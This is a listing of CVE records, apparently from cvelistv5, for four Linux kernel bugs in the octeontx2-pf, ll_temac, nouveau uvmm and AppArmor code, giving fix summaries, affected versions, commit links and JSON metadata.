Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

octeontx2-pf: Fix transmit scheduler resource leak

Summary

In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: Fix transmit scheduler resource leak Inorder to support shaping and scheduling, Upon class creation Netdev driver allocates trasmit schedulers. The previous patch which added support for Round robin scheduling has a bug due to which driver is not freeing transmit schedulers post class deletion. This patch fixes the same.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7af5582ea67209a23…
	https://git.kernel.org/stable/c/b34fe77a1b1865423…
	https://git.kernel.org/stable/c/bccb798e07f8bb8b9…

Impacted products

Vendor

Product

Version

Linux

Affected: 47a9656f168a4b76a1e069ed8a67924ea8c1ac43 , < 7af5582ea67209a23e44be9a9612ba7897be1f47 (git)
Affected: 47a9656f168a4b76a1e069ed8a67924ea8c1ac43 , < b34fe77a1b18654233e4e54b334fcaeddf487100 (git)
Affected: 47a9656f168a4b76a1e069ed8a67924ea8c1ac43 , < bccb798e07f8bb8b91212fe8ed1e421685449076 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35975",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:18:47.313061Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:26.403Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.986Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7af5582ea67209a23e44be9a9612ba7897be1f47"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b34fe77a1b18654233e4e54b334fcaeddf487100"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bccb798e07f8bb8b91212fe8ed1e421685449076"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/marvell/octeontx2/nic/qos.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7af5582ea67209a23e44be9a9612ba7897be1f47",
              "status": "affected",
              "version": "47a9656f168a4b76a1e069ed8a67924ea8c1ac43",
              "versionType": "git"
            },
            {
              "lessThan": "b34fe77a1b18654233e4e54b334fcaeddf487100",
              "status": "affected",
              "version": "47a9656f168a4b76a1e069ed8a67924ea8c1ac43",
              "versionType": "git"
            },
            {
              "lessThan": "bccb798e07f8bb8b91212fe8ed1e421685449076",
              "status": "affected",
              "version": "47a9656f168a4b76a1e069ed8a67924ea8c1ac43",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/marvell/octeontx2/nic/qos.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: Fix transmit scheduler resource leak\n\nInorder to support shaping and scheduling, Upon class creation\nNetdev driver allocates trasmit schedulers.\n\nThe previous patch which added support for Round robin scheduling has\na bug due to which driver is not freeing transmit schedulers post\nclass deletion.\n\nThis patch fixes the same."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:35.702Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7af5582ea67209a23e44be9a9612ba7897be1f47"
        },
        {
          "url": "https://git.kernel.org/stable/c/b34fe77a1b18654233e4e54b334fcaeddf487100"
        },
        {
          "url": "https://git.kernel.org/stable/c/bccb798e07f8bb8b91212fe8ed1e421685449076"
        }
      ],
      "title": "octeontx2-pf: Fix transmit scheduler resource leak",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35975",
    "datePublished": "2024-05-20T09:42:01.758Z",
    "dateReserved": "2024-05-17T13:50:33.143Z",
    "dateUpdated": "2025-05-04T09:09:35.702Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35796 (GCVE-0-2024-35796)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2025-05-04 12:55

Title

net: ll_temac: platform_get_resource replaced by wrong function

Summary

In the Linux kernel, the following vulnerability has been resolved: net: ll_temac: platform_get_resource replaced by wrong function The function platform_get_resource was replaced with devm_platform_ioremap_resource_byname and is called using 0 as name. This eventually ends up in platform_get_resource_byname in the call stack, where it causes a null pointer in strcmp. if (type == resource_type(r) && !strcmp(r->name, name)) It should have been replaced with devm_platform_ioremap_resource.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6d9395ba7f85bdb7a…
	https://git.kernel.org/stable/c/553d294db94b5f139…
	https://git.kernel.org/stable/c/46efbdbc95a30951c…
	https://git.kernel.org/stable/c/476eed5f1c2203477…
	https://git.kernel.org/stable/c/7e9edb569fd9f688d…
	https://git.kernel.org/stable/c/92c0c29f667870f17…
	https://git.kernel.org/stable/c/3a38a829c8bc27d78…

Impacted products

Vendor

Product

Version

Linux

Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 6d9395ba7f85bdb7af0b93272e537484ecbeff48 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 553d294db94b5f139378022df480a9fb6c3ae39e (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 46efbdbc95a30951c2579caf97b6df2ee2b3bef3 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 476eed5f1c22034774902a980aa48dc4662cb39a (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 7e9edb569fd9f688d887e36db8170f6e22bafbc8 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 92c0c29f667870f17c0b764544bdf22ce0e886a1 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 3a38a829c8bc27d78552c28e582eb1d885d07d11 (git)
Affected: 77c8cfdf808410be84be56aff7e0e186b8c5a879 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35796",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-31T18:39:44.232878Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:22:51.425Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.618Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/xilinx/ll_temac_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6d9395ba7f85bdb7af0b93272e537484ecbeff48",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "553d294db94b5f139378022df480a9fb6c3ae39e",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "46efbdbc95a30951c2579caf97b6df2ee2b3bef3",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "476eed5f1c22034774902a980aa48dc4662cb39a",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "7e9edb569fd9f688d887e36db8170f6e22bafbc8",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "92c0c29f667870f17c0b764544bdf22ce0e886a1",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "3a38a829c8bc27d78552c28e582eb1d885d07d11",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "77c8cfdf808410be84be56aff7e0e186b8c5a879",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/xilinx/ll_temac_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.8.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ll_temac: platform_get_resource replaced by wrong function\n\nThe function platform_get_resource was replaced with\ndevm_platform_ioremap_resource_byname and is called using 0 as name.\n\nThis eventually ends up in platform_get_resource_byname in the call\nstack, where it causes a null pointer in strcmp.\n\n\tif (type == resource_type(r) \u0026\u0026 !strcmp(r-\u003ename, name))\n\nIt should have been replaced with devm_platform_ioremap_resource."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:46.667Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
        },
        {
          "url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
        },
        {
          "url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
        },
        {
          "url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
        },
        {
          "url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
        }
      ],
      "title": "net: ll_temac: platform_get_resource replaced by wrong function",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35796",
    "datePublished": "2024-05-17T13:23:07.558Z",
    "dateReserved": "2024-05-17T12:19:12.339Z",
    "dateUpdated": "2025-05-04T12:55:46.667Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36018 (GCVE-0-2024-36018)

Vulnerability from cvelistv5 – Published: 2024-05-30 14:59 – Updated: 2025-05-04 09:10

Title

nouveau/uvmm: fix addr/range calcs for remap operations

Summary

In the Linux kernel, the following vulnerability has been resolved: nouveau/uvmm: fix addr/range calcs for remap operations dEQP-VK.sparse_resources.image_rebind.2d_array.r64i.128_128_8 was causing a remap operation like the below. op_remap: prev: 0000003fffed0000 00000000000f0000 00000000a5abd18a 0000000000000000 op_remap: next: op_remap: unmap: 0000003fffed0000 0000000000100000 0 op_map: map: 0000003ffffc0000 0000000000010000 000000005b1ba33c 00000000000e0000 This was resulting in an unmap operation from 0x3fffed0000+0xf0000, 0x100000 which was corrupting the pagetables and oopsing the kernel. Fixes the prev + unmap range calcs to use start/end and map back to addr/range.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/692a51bebf4552bdf…
	https://git.kernel.org/stable/c/0c16020d2b69a602c…
	https://git.kernel.org/stable/c/be141849ec00ef399…

Impacted products

Vendor

Product

Version

Linux

Affected: b88baab828713ce0b49b185444b2ee83bed373a8 , < 692a51bebf4552bdf0a79ccd68d291182a26a569 (git)
Affected: b88baab828713ce0b49b185444b2ee83bed373a8 , < 0c16020d2b69a602c8ae6a1dd2aac9a3023249d6 (git)
Affected: b88baab828713ce0b49b185444b2ee83bed373a8 , < be141849ec00ef39935bf169c0f194ac70bf85ce (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36018",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-06T18:34:51.763969Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-06T18:35:02.091Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.600Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/692a51bebf4552bdf0a79ccd68d291182a26a569"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c16020d2b69a602c8ae6a1dd2aac9a3023249d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be141849ec00ef39935bf169c0f194ac70bf85ce"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_uvmm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "692a51bebf4552bdf0a79ccd68d291182a26a569",
              "status": "affected",
              "version": "b88baab828713ce0b49b185444b2ee83bed373a8",
              "versionType": "git"
            },
            {
              "lessThan": "0c16020d2b69a602c8ae6a1dd2aac9a3023249d6",
              "status": "affected",
              "version": "b88baab828713ce0b49b185444b2ee83bed373a8",
              "versionType": "git"
            },
            {
              "lessThan": "be141849ec00ef39935bf169c0f194ac70bf85ce",
              "status": "affected",
              "version": "b88baab828713ce0b49b185444b2ee83bed373a8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_uvmm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau/uvmm: fix addr/range calcs for remap operations\n\ndEQP-VK.sparse_resources.image_rebind.2d_array.r64i.128_128_8\nwas causing a remap operation like the below.\n\nop_remap: prev: 0000003fffed0000 00000000000f0000 00000000a5abd18a 0000000000000000\nop_remap: next:\nop_remap: unmap: 0000003fffed0000 0000000000100000 0\nop_map: map: 0000003ffffc0000 0000000000010000 000000005b1ba33c 00000000000e0000\n\nThis was resulting in an unmap operation from 0x3fffed0000+0xf0000, 0x100000\nwhich was corrupting the pagetables and oopsing the kernel.\n\nFixes the prev + unmap range calcs to use start/end and map back to addr/range."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:41.008Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/692a51bebf4552bdf0a79ccd68d291182a26a569"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c16020d2b69a602c8ae6a1dd2aac9a3023249d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/be141849ec00ef39935bf169c0f194ac70bf85ce"
        }
      ],
      "title": "nouveau/uvmm: fix addr/range calcs for remap operations",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36018",
    "datePublished": "2024-05-30T14:59:42.091Z",
    "dateReserved": "2024-05-17T13:50:33.155Z",
    "dateUpdated": "2025-05-04T09:10:41.008Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-52443 (GCVE-0-2023-52443)

Vulnerability from cvelistv5 – Published: 2024-02-22 16:13 – Updated: 2025-05-04 07:36

Title

apparmor: avoid crash when parsed profile name is empty

Summary

In the Linux kernel, the following vulnerability has been resolved: apparmor: avoid crash when parsed profile name is empty When processing a packed profile in unpack_profile() described like "profile :ns::samba-dcerpcd /usr/lib*/samba/{,samba/}samba-dcerpcd {...}" a string ":samba-dcerpcd" is unpacked as a fully-qualified name and then passed to aa_splitn_fqname(). aa_splitn_fqname() treats ":samba-dcerpcd" as only containing a namespace. Thus it returns NULL for tmpname, meanwhile tmpns is non-NULL. Later aa_alloc_profile() crashes as the new profile name is NULL now. general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 6 PID: 1657 Comm: apparmor_parser Not tainted 6.7.0-rc2-dirty #16 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 RIP: 0010:strlen+0x1e/0xa0 Call Trace: <TASK> ? strlen+0x1e/0xa0 aa_policy_init+0x1bb/0x230 aa_alloc_profile+0xb1/0x480 unpack_profile+0x3bc/0x4960 aa_unpack+0x309/0x15e0 aa_replace_profiles+0x213/0x33c0 policy_update+0x261/0x370 profile_replace+0x20e/0x2a0 vfs_write+0x2af/0xe00 ksys_write+0x126/0x250 do_syscall_64+0x46/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 </TASK> ---[ end trace 0000000000000000 ]--- RIP: 0010:strlen+0x1e/0xa0 It seems such behaviour of aa_splitn_fqname() is expected and checked in other places where it is called (e.g. aa_remove_profiles). Well, there is an explicit comment "a ns name without a following profile is allowed" inside. AFAICS, nothing can prevent unpacked "name" to be in form like ":samba-dcerpcd" - it is passed from userspace. Deny the whole profile set replacement in such case and inform user with EPROTO and an explaining message. Found by Linux Verification Center (linuxtesting.org).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9286ee97aa4803d99…
	https://git.kernel.org/stable/c/1d8e62b5569cc1466…
	https://git.kernel.org/stable/c/5ff00408e5029d355…
	https://git.kernel.org/stable/c/0a12db736edbb4933…
	https://git.kernel.org/stable/c/9d4fa5fe2b1d56662…
	https://git.kernel.org/stable/c/5c0392fdafb0a2321…
	https://git.kernel.org/stable/c/77ab09b92f16c8439…
	https://git.kernel.org/stable/c/55a8210c9e7d21ff2…

Impacted products

Vendor

Product

Version

Linux

Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 9286ee97aa4803d99185768735011d0d65827c9e (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 5ff00408e5029d3550ee77f62dc15f1e15c47f87 (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 0a12db736edbb4933e4274932aeea594b5876fa4 (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 9d4fa5fe2b1d56662afd14915a73b4d0783ffa45 (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 5c0392fdafb0a2321311900be83ffa572bef8203 (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 77ab09b92f16c8439a948d1af489196953dc4a0e (git)
Affected: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 , < 55a8210c9e7d21ff2644809699765796d4bfb200 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 4.19.306 , ≤ 4.19.* (semver)
Unaffected: 5.4.268 , ≤ 5.4.* (semver)
Unaffected: 5.10.209 , ≤ 5.10.* (semver)
Unaffected: 5.15.148 , ≤ 5.15.* (semver)
